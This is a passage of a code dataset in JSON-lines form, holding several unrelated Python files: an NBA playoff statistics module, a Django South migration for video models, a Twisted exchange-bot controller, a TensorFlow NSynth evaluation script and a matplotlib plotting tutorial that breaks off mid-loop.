tuple/list of length 2.\n convert_ids - Boolean, if set will convert ids to values (default True)\n summary_name - The name to store the df as (default 'games')\n '''\n self.set_summary(summary_name)\n\n if type(seasons) == list or type(seasons) == tuple:\n assert len(seasons) == 2, 'Must provide int or tuple/list of length 2'\n min_season = seasons[0]\n max_season = seasons[1]\n season_str = 'g.season as season, '\n else:\n assert type(seasons) == int, 'Must provide int or tuple/list of length 2'\n min_season, max_season = seasons, seasons\n season_str = ''\n\n if convert_ids:\n team_str = 't1.abbreviation AS home_team, t2.abbreviation AS visitor_team, '\n team_join = '''LEFT JOIN teams t1 on g.home_team_id = t1.team_id\n LEFT JOIN teams t2 on g.visitor_team_id = t2.team_id'''\n else:\n team_str = 'g.home_team_id AS home_team, g.visitor_team_id AS visitor_team, '\n team_join = ''\n\n sql_str = '''SELECT {2}date_game, {3}\n home_pts > visitor_pts AS home_victory FROM games g\n LEFT JOIN playoffgames p on g.game_id = p.game_id\n {4}\n WHERE g.season >= {0} AND g.season <= {1} AND (p.series_id = 23 or p.series_id IS NULL)'''.format(\n min_season, max_season, season_str, team_str, team_join)\n\n season_games = self.read_table(get_str=sql_str)\n season_games.loc[:,'visitor_victory'] = 1 - season_games.loc[:,'home_victory']\n\n self.summary[self.current_summary] = season_games\n\n def standings(self, max_date=None, rank_method='min', override_df=pd.DataFrame()):\n '''Calculates the standings at the date provided.\n The games summary for the given season must be already stored. Run season_games if it is not.\n Returns the games included in the stanndings and the league standings. Ties are all given the same ranking by default.\n\n Keyword arguments:\n max_date - The date to take the standings on. If not provided, will give current standings (default None)\n rank_method - The method used to sort the standings (default 'min')\n override_df - If provided, will use this df instead of stored df (default None)\n '''\n if override_df.empty:\n assert 'games' in self.summary.keys(), '\"games\" summary not loaded, please run season_games function.'\n games_restricted = self.summary['games'].copy()\n else:\n games_restricted = override_df.copy()\n\n if max_date != None:\n season_start = games_restricted['date_game'].min()\n assert max_date >= season_start, 'Date provided is before the beginning of the season. Please provide date after: {}'.format(season_start)\n\n games_restricted = games_restricted[games_restricted['date_game'] <= max_date]\n\n home_visitor = ['home', 'visitor']\n standings_list = []\n for i in range(2):\n standings_temp = games_restricted.groupby(home_visitor[i] + '_team').agg(\n {home_visitor[i]+'_victory':sum,\n home_visitor[-1-i]+'_victory':sum}).rename(columns={home_visitor[i]+'_victory':'W_'+home_visitor[i],\n home_visitor[-1-i]+'_victory':'L_'+home_visitor[i]})\n standings_temp.index.name = None\n standings_list.append(standings_temp)\n\n standings = pd.concat(standings_list, axis=1)\n for W_L in ['W', 'L']:\n standings.loc[:,W_L] = standings[W_L+'_home']+ standings[W_L+'_visitor']\n standings.loc[:,'Played'] = standings['W'] + standings['L']\n standings.loc[:,'W_pct'] = standings['W'] / standings['Played']\n standings.loc[:,'position'] = standings['W_pct'].rank(ascending=False, method=rank_method).astype(int)\n\n return games_restricted, standings.sort_values('position')\n\n def wpct_all(self, override_df=pd.DataFrame()):\n '''Returns a df containings the W pct for teams per season.\n Must run the season games query separately over more than 1 season.\n\n Keyword arguments:\n override_df - If provided this df will be used instead of the stored games df\n '''\n if override_df.empty:\n if 'games' not in self.summary.keys():\n print('\"games\" summary loaded, season_games function run for all modern (>1983) seasons.')\n self.season_games()\n all_games = self.summary['games'].copy()\n else:\n all_games = override_df.copy()\n\n all_standings = []\n for season, season_df in all_games.groupby('season'):\n temp_df = season_df.drop('season', axis=1)\n _, temp_standings = self.standings(override_df=temp_df)\n temp_standings = temp_standings.reset_index().rename(columns={'index':'team'})\n temp_standings.loc[:,'season'] = season\n all_standings.append(temp_standings[['team','season','W_pct']])\n\n return pd.concat(all_standings)\n\n def playoffseries(self, games_name='playoffgames', series_name='playoffseries', modern_only=True):\n '''Queries database for playoff games. Runs function to derive information from the raw playoff game data.\n i.e. number of games in the series, possible number of games, cumulative series score\n Creates a df containing each individual game and a df with each series. Dfs are stored in summary dict.\n\n Keyword arguments:\n games_name - The key to use in the summary dict for the playoff games df (default 'playoffgames')\n series_name - The key to use in the summary dict for the playoff series df (default 'playoffseries')\n modern_only - Only return seasons after 1983 (default True)\n '''\n sql_str = '''SELECT p.playoffgames_id, p.game_id, p.series_id, p.game_no, g.season, g.date_game, g.home_team_id, g.visitor_team_id, g.home_pts > g.visitor_pts AS home_wins\n FROM playoffgames p\n INNER JOIN games g ON g.game_id = p.game_id\n WHERE p.series_id <> 23'''\n if modern_only:\n sql_str += ' and g.season > 1983'\n\n playoffgames = self.read_table(get_str=sql_str)\n\n team_ids = playoffgames[['home_team_id','visitor_team_id']]\n playoffgames.loc[:,'teams_combo'] = team_ids.min(axis=1).astype(str) + ',' + team_ids.max(axis=1).astype(str)\n\n # create a unique value for each series so it is easy to group each series\n playoffgames = playoffgames.sort_values(['season', 'series_id', 'teams_combo'])\n false_series_ids = playoffgames.groupby(['season', 'series_id', 'teams_combo'], as_index=False)['game_id'].min().rename(columns={'game_id':'false_series_id'})\n playoffgames = playoffgames.merge(false_series_ids, how='left', on=['season', 'series_id', 'teams_combo'])\n playoffgames = playoffgames.drop(['teams_combo'], axis=1)\n\n playoffgames.loc[:,'homecourt_team_id'] = playoffgames['home_team_id'].where(playoffgames['game_no']==1, np.nan)\n playoffgames.loc[:,'visitorcourt_team_id'] = playoffgames['visitor_team_id'].where(playoffgames['game_no']==1, np.nan)\n playoffgames.loc[:,'homecourt_team_id'] = playoffgames.loc[:,'homecourt_team_id'].fillna(method='ffill').astype(int)\n playoffgames.loc[:,'visitorcourt_team_id'] = playoffgames.loc[:,'visitorcourt_team_id'].fillna(method='ffill').astype(int)\n\n playoffgames.loc[:,'homecourt_wins'] = playoffgames['home_wins'].where(playoffgames['home_team_id'] == playoffgames['homecourt_team_id'], 1-playoffgames['home_wins'])\n playoffgames.loc[:,'homecourt_cumwins'] = playoffgames.groupby('false_series_id')['homecourt_wins'].cumsum()\n playoffgames.loc[:,'visitorcourt_cumwins'] = playoffgames['game_no'] - playoffgames['homecourt_cumwins']\n playoffgames.loc[:,'series_score'] = playoffgames['homecourt_cumwins'].astype(str) + '-' + playoffgames['visitorcourt_cumwins'].astype(str)\n\n assert (playoffgames['homecourt_cumwins'] + playoffgames['visitorcourt_cumwins']).max() <= 7, 'More than 7 games in a series'\n assert playoffgames['homecourt_cumwins'].max() <= 4, 'More than 4 wins by a team with homecourt in a series'\n assert playoffgames['visitorcourt_cumwins'].max() <= 4, 'More than 4 wins by a team without homecourt in a series'\n\n # create df that has one row per series, most columns are just duplicated in initial table, others require some aggregation\n playoffseries = playoffgames.groupby('false_series_id').agg({'series_id':'first',\n 'season':'first',\n 'homecourt_team_id':'first',\n 'visitorcourt_team_id':'first',\n 'game_no':'max',\n 'homecourt_cumwins':'max',\n 'visitorcourt_cumwins':'max',\n 'series_score':','.join}\n ).rename(columns={'game_no':'games_required',\n 'homecourt_cumwins':'homecourt_wins',\n 'visitorcourt_cumwins':'visitorcourt_wins',\n 'series_score':'series_timeline'}\n ).reset_index()\n playoffseries.loc[:,'series_timeline'] = '0-0,'+playoffseries['series_timeline']\n\n self.season_games(convert_ids=False)\n w_pct = self.wpct_all()\n for h_v in ['home', 'visitor']:\n playoffseries = playoffseries.merge(w_pct, how='left', left_on=[h_v+'court_team_id','season'], right_on=['team','season']\n ).drop(columns=['team']\n ).rename(columns={'W_pct':h_v+'court_wpct'})\n playoffseries.loc[:,'wpct_diff'] = playoffseries['homecourt_wpct'] - playoffseries['visitorcourt_wpct']\n\n for team_column in ['homecourt_team_id', 'visitorcourt_team_id']:\n playoffseries = self.df_ids(playoffseries, 'team', ['abbreviation'], column_convert={'abbreviation':team_column.replace('_id','')}, header_override=team_column)\n playoffseries = self.df_ids(playoffseries, 'series', ['series_name','conference','round'])\n playoffseries = playoffseries.set_index('false_series_id')\n\n playoffseries.loc[:,'series_games'] = playoffseries[['homecourt_wins','visitorcourt_wins']].max(axis=1) * 2 - 1\n current_check = playoffseries['season'] == dt.date.today().year\n assert ((playoffseries['series_games'].isin([5,7])) | (current_check)).mean() == 1, 'series games must be 5 or 7.'\n gamesreq_check = ((playoffseries['games_required'] > playoffseries['series_games']) & (~current_check)).sum()\n assert gamesreq_check == 0, 'Games required must be less than or equal to series games, in {} cases it is not'.format(gamesreq_check)\n\n playoffseries.loc[:,'homecourt_victory'] = playoffseries['homecourt_wins'] > playoffseries['visitorcourt_wins']\n playoffseries.loc[:,'victor'] = playoffseries['homecourt_team'].where(playoffseries['homecourt_victory'], playoffseries['visitorcourt_team'])\n playoffseries.loc[:,'loser'] = playoffseries['homecourt_team'].where(~playoffseries['homecourt_victory'], playoffseries['visitorcourt_team'])\n\n series_wins = playoffgames[['false_series_id','game_no', 'home_wins']].set_index(['false_series_id','game_no']).unstack()\n series_wins.columns = ['homegame_'+str(header[1]) for header in series_wins.columns]\n playoffseries = playoffseries.merge(series_wins, how='left', left_index=True, right_index=True)\n\n self.set_summary(games_name)\n self.summary[self.current_summary] = playoffgames\n self.set_summary(series_name)\n self.summary[self.current_summary] = playoffseries\n\n def win_probability(self, score, playoffseries=pd.DataFrame(), comeback=True, flipscore=True, force_game=None,\n rounds=[1,2,3,4], series_games=[5,7], wpct_column='wpct_diff', wpct=(-1,1), seasons=1983):\n '''Calculates the probability of a team winning or forcing a game given a series score.\n By default, calculates the probability of a comeback win and is ambivalent to the home team in the score.\n If the score is even, it is considered a comeback for the team without homecourt advantage to win.\n Prints the probability and returns all instances where a team was successul.\n\n Keyword arguments:\n score - A string of the score of interest, in format \"[0-4]-[0-4]\"\n playoffseries - The df containing playoff series. If not provided, will use default query of db (default pd.DataFrame())\n comeback - If True, the probability refers to the team currently losing coming back and winning (default True)\n flipscore - If True, the score provided will also be flipped, i.e. ambivalent to homecourt advantage (default True)\n force_game - Set this to calculate the probabilty of forcing a game instead of just winning (default None)\n rounds - The playoff rounds to include, provide a list of ints.\n Round 1 is the finals, each subsequent number is the round less significant.\n Round 4 is the current first round of the playoffs (default [1,2,3,4])\n series_games - Specify the length of rounds to include as a list of ints (default [5,7])\n wpct_column - The column to apply the wpct filter to (default 'wpct_diff')\n wpct - Games with a wpct in this range will be included (default (-1,1))\n seasons - Specify the seasons to include. If an int is provided, it will be used a min,\n otherwise provide a min/max list/tuple (default 1983)\n '''\n # if no df is specified, query db if required and use store playoffseries df\n if playoffseries.empty:\n if 'playoffseries' not in self.summary.keys():\n self.playoffseries()\n playoffseries = self.summary['playoffseries']\n\n filtered_series = playoffseries[playoffseries['round'].isin(rounds)]\n filtered_series = filtered_series[filtered_series['series_games'].isin(series_games)]\n filtered_series = filtered_series[filtered_series[wpct_column].between(wpct[0],wpct[1])]\n\n if type(seasons) == int:\n seasons = (seasons, filtered_series['season'].max()+1)\n\n assert type(seasons) == tuple or type(seasons) == list, 'seasons must be an int or list/tuple'\n assert len(seasons) == 2, 'seasons must be an int or of length 2, {} of {} provided'.format(type(seasons), len(seasons))\n filtered_series = filtered_series[filtered_series['season'].between(seasons[0], seasons[1])]\n\n home_wins = int(score[0])\n visitor_wins = int(score[-1])\n\n if home_wins == visitor_wins:\n home_ahead = True\n flipscore = False\n else:\n home_ahead = home_wins > visitor_wins\n check_homewin = not home_ahead if comeback else home_ahead\n scores = [score, score[::-1]] if flipscore else [score]\n\n if flipscore:\n prob_str = 'losing'\n else:\n prob_str = 'home' if check_homewin else 'visitor'\n winning_str = 'forcing game {}'.format(force_game) if force_game else 'winning'\n print('Probability of {} team {}: '.format(prob_str, winning_str), end='')\n\n packages = []\n for filter_score in scores:\n filter1 = filtered_series['series_timeline'].str.contains(filter_score)\n packages.append(winfilter(filtered_series, filter1, home_victor=check_homewin, force_game=force_game))\n check_homewin = not check_homewin\n\n package2 = (0,0,pd.DataFrame()) if len(packages) == 1 else packages[1]\n\n return playoff_probability(filtered_series, packages[0], package2)\n\ndef winfilter(playoffseries, filter1, home_victor=True, force_game=None):\n '''Applies the filter specified and then finds the occasions where teams have won/forced game x from this position.\n Returns:\n num - the number of times teams in the applied filter have won.\n den - the total number of times this filter has occurred.\n combined_filter - the filter matching scenarios where teams have won in this scenario\n\n Keyword arguments:\n playoffseries - The df containing playoff series.\n filter1 - The filter to use to get the series in question, must be same size as playoffseries df\n home_victor - If True, will return results for cases where the home team is victorious (default True)\n force_game - If set, the series reaching the given game will be considered a \"victory\"\n i.e. results will now relate to the scenario of forcing game x (default None)\n '''\n if force_game:\n filter2 = playoffseries['games_required'] >= force_game\n else:\n filter2 = playoffseries['homecourt_victory'] if home_victor else ~playoffseries['homecourt_victory']\n combined_filter = filter1 & filter2\n num = sum(combined_filter)\n den = sum(filter1)\n return num, den, combined_filter\n\ndef playoff_probability(playoffseries, package1, package2=(0,0,pd.DataFrame())):\n '''Takes the num, den and combined filter from winfilter function.\n Returns the probability results and instances where teams have been successful.\n\n Keyword arguments:\n playoffseries - The df containing playoffseries.\n package1 - a tuple containig num, den and combined_filter.\n package2 - a tuple containig num, den and combined_filter (default (0,0,pd.DataFrame()))\n '''\n num = package1[0] + package2[0]\n den = package1[1] + package2[1]\n print('{:.1%} ({}/{})'.format(num/den, num, den))\n des_columns = ['season','series_name','homecourt_team','homecourt_wpct','visitorcourt_team','visitorcourt_wpct',\n 'wpct_diff','homecourt_wins','visitorcourt_wins','victor','loser','homecourt_victory','series_timeline']\n\n if not package2[2].empty:\n return playoffseries[package1[2]|package2[2]][des_columns].sort_values('season', ascending=False)\n else:\n return playoffseries[package1[2]][des_columns].sort_values('season', ascending=False)\n","sub_path":"nba_stats/read_write/basic_stats.py","file_name":"basic_stats.py","file_ext":"py","file_size_in_byte":43780,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"174933445","text":"# -*- coding: utf-8 -*-\nfrom south.utils import datetime_utils as datetime\nfrom south.db import db\nfrom south.v2 import SchemaMigration\nfrom django.db import models\n\n\nclass Migration(SchemaMigration):\n\n def forwards(self, orm):\n # Adding model 'VideoAlbum'\n db.create_table(u'video_videoalbum', (\n (u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),\n ('title', self.gf('django.db.models.fields.CharField')(default=u'', max_length=255)),\n ))\n db.send_create_signal(u'video', ['VideoAlbum'])\n\n # Adding model 'Video'\n db.create_table(u'video_video', (\n (u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),\n ('title', self.gf('django.db.models.fields.CharField')(default=u'', max_length=255)),\n ('source', self.gf('embed_video.fields.EmbedVideoField')(max_length=254, blank=True)),\n ))\n db.send_create_signal(u'video', ['Video'])\n\n # Adding M2M table for field album on 'Video'\n m2m_table_name = db.shorten_name(u'video_video_album')\n db.create_table(m2m_table_name, (\n ('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),\n ('video', models.ForeignKey(orm[u'video.video'], null=False)),\n ('videoalbum', models.ForeignKey(orm[u'video.videoalbum'], null=False))\n ))\n db.create_unique(m2m_table_name, ['video_id', 'videoalbum_id'])\n\n\n def backwards(self, orm):\n # Deleting model 'VideoAlbum'\n db.delete_table(u'video_videoalbum')\n\n # Deleting model 'Video'\n db.delete_table(u'video_video')\n\n # Removing M2M table for field album on 'Video'\n db.delete_table(db.shorten_name(u'video_video_album'))\n\n\n models = {\n u'video.video': {\n 'Meta': {'object_name': 'Video'},\n 'album': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': \"u'videos'\", 'symmetrical': 'False', 'to': u\"orm['video.VideoAlbum']\"}),\n u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),\n 'source': ('embed_video.fields.EmbedVideoField', [], {'max_length': '254', 'blank': 'True'}),\n 'title': ('django.db.models.fields.CharField', [], {'default': \"u''\", 'max_length': '255'})\n },\n u'video.videoalbum': {\n 'Meta': {'object_name': 'VideoAlbum'},\n u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),\n 'title': ('django.db.models.fields.CharField', [], {'default': \"u''\", 'max_length': '255'})\n }\n }\n\n complete_apps = ['video']","sub_path":"strongme/video/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":2670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"38821011","text":"from twisted.internet import reactor\n\nfrom src.comm.bot import Bot\nfrom src.comm.parser_factory import ParserFactory\nfrom src.comm.protocol_factory import ProtocolFactory\n\n\nclass CommControl:\n\n def __init__(self):\n\n self.__protocol_factory = ProtocolFactory()\n self.__parser_factory = ParserFactory()\n self.__setup_reactor()\n\n def use_command(self, command):\n\n exchange_bot = self.__create_exchange_bot(command)\n exchange_bot.run()\n\n def __setup_reactor(self):\n\n # ought to be triggered when shutting down\n def stop():\n reactor.stop()\n\n reactor.runReturn()\n reactor.addSystemEventTrigger('before', 'shutdown', stop)\n\n def __create_exchange_bot(self, specification):\n\n protocol_class = self.__get_protocol_class(specification[\"protocol\"])\n parser_class = self.__get_parser_class(self.__get_parser_name(specification))\n\n exchange_bot = Bot(\n protocol_class,\n parser_class,\n specification[\"address\"],\n specification[\"action\"],\n specification[\"parameters\"]\n )\n\n return exchange_bot\n\n def __get_protocol_class(self, protocol_name):\n\n if protocol_name in self.__protocol_factory.get_protocols():\n return self.__protocol_factory.create(protocol_name)\n else:\n raise AttributeError(\"No such protocol\")\n\n def __get_parser_class(self, parser_name):\n\n if parser_name in self.__parser_factory.get_parsers():\n return self.__parser_factory.create(parser_name)\n else:\n raise AttributeError(\"No such parser\")\n\n def __get_parser_name(self, specification):\n\n return specification[\"name\"] + \" \" + specification[\"protocol\"]","sub_path":"EasyCrypto/src/comm/comm_control.py","file_name":"comm_control.py","file_ext":"py","file_size_in_byte":1766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"619652226","text":"# Copyright 2017 Google Inc. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\nr\"\"\"The evaluation script.\n\nThis script requires tensorflow 1.1.0-rc1 or beyond.\nAs of 04/05/17 this requires installing tensorflow from source,\n(https://github.com/tensorflow/tensorflow/releases)\n\nSo that it works locally, the default worker_replicas and total_batch_size are\nset to 1. For training in 200k iterations, they both should be 32.\n\"\"\"\n\nimport tensorflow as tf\nimport tensorflow_probability as tfp\nimport numpy as np\nimport os\nimport pickle\n\nfrom magenta.models.nsynth import utils\n\nslim = tf.contrib.slim\nFLAGS = tf.app.flags.FLAGS\n\ntf.app.flags.DEFINE_string(\"master\", \"\",\n \"BNS name of the TensorFlow master to use.\")\ntf.app.flags.DEFINE_string(\"config\", \"h512_bo16\", \"Model configuration name\")\ntf.app.flags.DEFINE_integer(\"task\", 0,\n \"Task id of the replica running the training.\")\ntf.app.flags.DEFINE_integer(\"worker_replicas\", 1,\n \"Number of replicas. We train with 32.\")\ntf.app.flags.DEFINE_integer(\"ps_tasks\", 0,\n \"Number of tasks in the ps job. If 0 no ps job is \"\n \"used. We typically use 11.\")\ntf.app.flags.DEFINE_integer(\"total_batch_size\", 1,\n \"Batch size spread across all sync replicas.\"\n \"We use a size of 32.\")\ntf.app.flags.DEFINE_integer(\"sample_length\", 64000,\n \"Raw sample length of input.\")\ntf.app.flags.DEFINE_integer(\"num_evals\", None,\n \"number of evauaitons -- None does entire dataset\")\ntf.app.flags.DEFINE_string(\"logdir\", \"/tmp/nsynth\",\n \"The log directory for this experiment.\")\ntf.app.flags.DEFINE_string(\"checkpoint_dir\", \"/tmp/nsynth\",\n \"Where the checkpoints are stored\")\ntf.app.flags.DEFINE_string(\"checkpoint_path\", None,\n \"path of checkpoint -- if none use checkpoint_dir\")\ntf.app.flags.DEFINE_string(\"problem\", \"nsynth\",\n \"Which problem setup (i.e. dataset) to use\")\ntf.app.flags.DEFINE_string(\"eval_path\", \"\", \"The path to the train tfrecord.\")\ntf.app.flags.DEFINE_string(\"log\", \"INFO\",\n \"The threshold for what messages will be logged.\"\n \"DEBUG, INFO, WARN, ERROR, or FATAL.\")\ntf.app.flags.DEFINE_bool(\"vae\", False,\n \"Whether or not to train variationally\")\ntf.app.flags.DEFINE_bool(\"small\", False,\n \"Whether to use full model i.e. 30 layers in decoder/encoder or reduced model\")\ntf.app.flags.DEFINE_integer(\"asymmetric\", 0,\n \"Whether to have equal number of layers in decoder/encoder or a weaker decoder\")\ntf.app.flags.DEFINE_bool(\"kl_annealing\", False,\n \"Whether to use kl_annealing\")\ntf.app.flags.DEFINE_float(\"aux_coefficient\", 0,\n \"coefficient for auxilliary loss\")\ntf.app.flags.DEFINE_float(\"annealing_loc\", 1750.,\n \"params of normal cdf for annealing\")\ntf.app.flags.DEFINE_float(\"annealing_scale\", 150.,\n \"params of normal cdf for annealing\")\ntf.app.flags.DEFINE_float(\"kl_threshold\", None,\n \"Threshold with which to bound KL-Loss\")\ntf.app.flags.DEFINE_float(\"input_dropout\", 1,\n \"How much dropout at input to add\")\n\ndef main(unused_argv=None):\n tf.logging.set_verbosity(FLAGS.log)\n\n if FLAGS.config is None:\n raise RuntimeError(\"No config name specified.\")\n\n if FLAGS.vae:\n config = utils.get_module(\"wavenet.\" + FLAGS.config).VAEConfig(\n FLAGS.eval_path, sample_length=FLAGS.sample_length, problem=FLAGS.problem, small=FLAGS.small, asymmetric=FLAGS.asymmetric, aux=FLAGS.aux_coefficient, dropout=FLAGS.input_dropout)\n else:\n config = utils.get_module(\"wavenet.\" + FLAGS.config).Config(\n FLAGS.eval_path, sample_length=FLAGS.sample_length, problem=FLAGS.problem, small=FLAGS.small, asymmetric=FLAGS.asymmetric)\n\n logdir = FLAGS.logdir\n tf.logging.info(\"Saving to %s\" % logdir)\n\n with tf.Graph().as_default():\n total_batch_size = FLAGS.total_batch_size\n assert total_batch_size % FLAGS.worker_replicas == 0\n worker_batch_size = total_batch_size / FLAGS.worker_replicas\n\n # Run the Reader on the CPU\n cpu_device = \"/job:localhost/replica:0/task:0/cpu:0\"\n if FLAGS.ps_tasks:\n cpu_device = \"/job:worker/cpu:0\"\n\n with tf.device(cpu_device):\n inputs_dict = config.get_batch(worker_batch_size, is_training=False)\n\n with tf.device(\n tf.train.replica_device_setter(ps_tasks=FLAGS.ps_tasks,\n merge_devices=True)):\n global_step = tf.get_variable(\n \"global_step\", [],\n tf.int32,\n initializer=tf.constant_initializer(0),\n trainable=False)\n\n # build the model graph\n outputs_dict = config.build(inputs_dict, is_training=False)\n\n if FLAGS.vae:\n if FLAGS.kl_annealing:\n dist = tfp.distributions.Normal(loc=FLAGS.annealing_loc, scale=FLAGS.annealing_scale)\n annealing_rate = dist.cdf(tf.to_float(global_step)) # how to adjust the annealing\n else:\n annealing_rate = 0.\n kl = outputs_dict[\"loss\"][\"kl\"]\n rec = outputs_dict[\"loss\"][\"rec\"]\n aux = outputs_dict[\"loss\"][\"aux\"]\n tf.summary.scalar(\"kl\", kl)\n tf.summary.scalar(\"rec\", rec)\n tf.summary.scalar(\"annealing_rate\", annealing_rate)\n if FLAGS.kl_threshold is not None:\n kl = tf.maximum(tf.cast(FLAGS.kl_threshold, dtype=kl.dtype), kl)\n if FLAGS.aux_coefficient > 0:\n tf.summary.scalar(\"aux\", aux)\n loss = rec + annealing_rate*kl + tf.cast(FLAGS.aux_coefficient, dtype=tf.float32)*aux\n else:\n loss = outputs_dict[\"loss\"]\n \n tf.summary.scalar(\"train_loss\", loss)\n\n labels = inputs_dict[\"parameters\"]\n x_in = inputs_dict[\"wav\"]\n batch_size, _ = x_in.get_shape().as_list()\n predictions = outputs_dict[\"predictions\"]\n _, pred_dim = predictions.get_shape().as_list()\n predictions = tf.reshape(predictions, [batch_size, -1, pred_dim])\n encodings = outputs_dict[\"encoding\"]\n\n\n session_config = tf.ConfigProto(allow_soft_placement=True)\n\n # Define the metrics:\n if FLAGS.vae:\n names_to_values, names_to_updates = slim.metrics.aggregate_metric_map({\n 'eval/kl': slim.metrics.streaming_mean(kl),\n 'eval/rec': slim.metrics.streaming_mean(rec),\n 'eval/loss': slim.metrics.streaming_mean(loss),\n 'eval/predictions': slim.metrics.streaming_concat(predictions),\n 'eval/labels': slim.metrics.streaming_concat(labels),\n 'eval/encodings': slim.metrics.streaming_concat(encodings),\n 'eval/audio': slim.metrics.streaming_concat(x_in)\n })\n else:\n names_to_values, names_to_updates = slim.metrics.aggregate_metric_map({\n 'eval/loss': slim.metrics.streaming_mean(loss),\n 'eval/predictions': slim.metrics.streaming_concat(predictions),\n 'eval/labels': slim.metrics.streaming_concat(labels),\n 'eval/encodings': slim.metrics.streaming_concat(encodings),\n 'eval/audio': slim.metrics.streaming_concat(x_in)\n })\n\n print('Running evaluation Loop...')\n if FLAGS.checkpoint_path is not None:\n checkpoint_path = FLAGS.checkpoint_path\n else:\n checkpoint_path = tf.train.latest_checkpoint(FLAGS.checkpoint_dir)\n metric_values = slim.evaluation.evaluate_once(\n num_evals=FLAGS.num_evals,\n master=FLAGS.master,\n checkpoint_path=checkpoint_path,\n logdir=FLAGS.logdir,\n eval_op=names_to_updates.values(),\n final_op=names_to_values.values(),\n session_config=session_config)\n\n names_to_values = dict(zip(names_to_values.keys(), metric_values))\n\n losses = {}\n data_name = FLAGS.eval_path.split('/')[-1].split('.')[0]\n outpath = os.path.join(FLAGS.logdir, data_name)\n for k, v in names_to_values.items():\n name = k.split('/')[-1]\n if name in ['predictions', 'encodings', 'labels', 'audio']:\n out = outpath+'-{}'.format(name)\n if name == 'predictions':\n v = np.argmax(v, axis = -1)\n v = utils.inv_mu_law_numpy(v - 128)\n np.save(out, v)\n else:\n losses[name] = v\n\n out_loss = outpath+'-losses.pickle'\n with open(out_loss, 'w') as w:\n pickle.dump(losses, w)\n\n\n\n\ndef console_entry_point():\n tf.app.run(main)\n\n\nif __name__ == \"__main__\":\n console_entry_point()","sub_path":"magenta/models/nsynth/wavenet/eval.py","file_name":"eval.py","file_ext":"py","file_size_in_byte":9276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"623141513","text":" # -*- coding: utf-8 -*-\n\"\"\"\n@time:2018/8/5 12:01\n\n@author: BX\n\"\"\"\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport numpy as np\n'线性方程'\n#figure,show,plot\n# x=np.linspace(-1,1,50)\n# y1=2*x+1\n# y2=x**2+1\n# plt.figure()\n# plt.plot(x,y1,'g')#g,r,y,b\n# plt.figure(num=3,figsize=(8,6))\n# '坐标轴设置'\n# plt.xlim((-1,2))#坐标轴范围\n# plt.ylim((-2,3))\n# plt.xlabel('I am y')#坐标轴标签\n# plt.ylabel('I am x')\n# new_ticks=np.linspace(-1,2,5)#坐标轴数据a\n# plt.xticks(new_ticks)#替换xticks\n# plt.yticks([-2,-1.8,-1,1.22,3],\n# [r'$really\\ good$',r'$bad\\ \\alpha$',r'$normal$',r'$good$',r'$really\\ good$'])#$变成数学形式的字体\n# #gca=get current axis\n# ax=plt.gca()#拿出轴\n# ax.spines['right'].set_color('none')#轴的边框\n# ax.spines['top'].set_color('none')\n# ax.xaxis.set_ticks_position('bottom')#坐标轴用哪一个轴代替,相当于产生了x轴\n# ax.yaxis.set_ticks_position('left')#相当于产生了y轴\n# #设置坐标轴位置\n# ax.spines['bottom'].set_position(('data',0))#设置横轴在y轴数据的-1,axes,定位到百分之多少的位置\n# ax.spines['left'].set_position(('data',0))\n#\n# '图例设置'\n# l1,=plt.plot(x,y2,'r',label='up')\n# l2,=plt.plot(x,y1,'b--',linewidth=2,label='down')\n# plt.legend(handles=[l1,l2,],labels=['a','b'],loc='best')#loc为best表示把标签放到最好的位置\n#\n# '添加注释'\n# x=np.linspace(-3,3,50)\n# y=2*x+1\n# plt.figure(num=4,figsize=(8,5))\n# plt.plot(x,y)\n# ax=plt.gca()#拿出轴\n# ax.spines['right'].set_color('none')#轴的边框\n# ax.spines['top'].set_color('none')\n# ax.xaxis.set_ticks_position('bottom')#坐标轴用哪一个轴代替,相当于产生了x轴\n# ax.yaxis.set_ticks_position('left')#相当于产生了y轴\n# #设置坐标轴位置\n# ax.spines['bottom'].set_position(('data',0))#设置横轴在y轴数据的-1,axes,定位到百分之多少的位置\n# ax.spines['left'].set_position(('data',0))\n# x0=1\n# y0=2*x0+1\n# plt.scatter(x0,y0,s=50,color='b')\n# plt.plot([x0,x0],[y0,0],'k--',lw=2.5)\n# #method 1\n# plt.annotate(r'$2x+1=%s$'%y0,xy=(x0,y0),xycoords='data',xytext=(+30,-30),textcoords='offset points',fontsize=16,arrowprops=dict(arrowstyle='->',connectionstyle='arc3,rad=.2'))\n# #method 2\n# plt.text(-3,3,r'$This\\ is\\ some\\ text.\\ \\mu \\sigma_i \\alpha_t$',fontdict={'size':16,'color':'r'})\n#\n#\n# '线遮住的部分设置透明度'\n# x=np.linspace(-3,3,50)\n# y=0.1*x\n# plt.figure()\n# plt.plot(x,y,linewidth=10,zorder=1)#需要在for里面设置zoeder比原来的大\n# plt.ylim(-2,2)\n# ax=plt.gca()#拿出轴\n# ax.spines['right'].set_color('none')#轴的边框\n# ax.spines['top'].set_color('none')\n# ax.xaxis.set_ticks_position('bottom')#坐标轴用哪一个轴代替,相当于产生了x轴\n# ax.yaxis.set_ticks_position('left')#相当于产生了y轴\n# #设置坐标轴位置\n# ax.spines['bottom'].set_position(('data',0))#设置横轴在y轴数据的-1,axes,定位到百分之多少的位置\n# ax.spines['left'].set_position(('data',0))\n# for label in ax.get_xticklabels() + ax.get_yticklabels():\n# 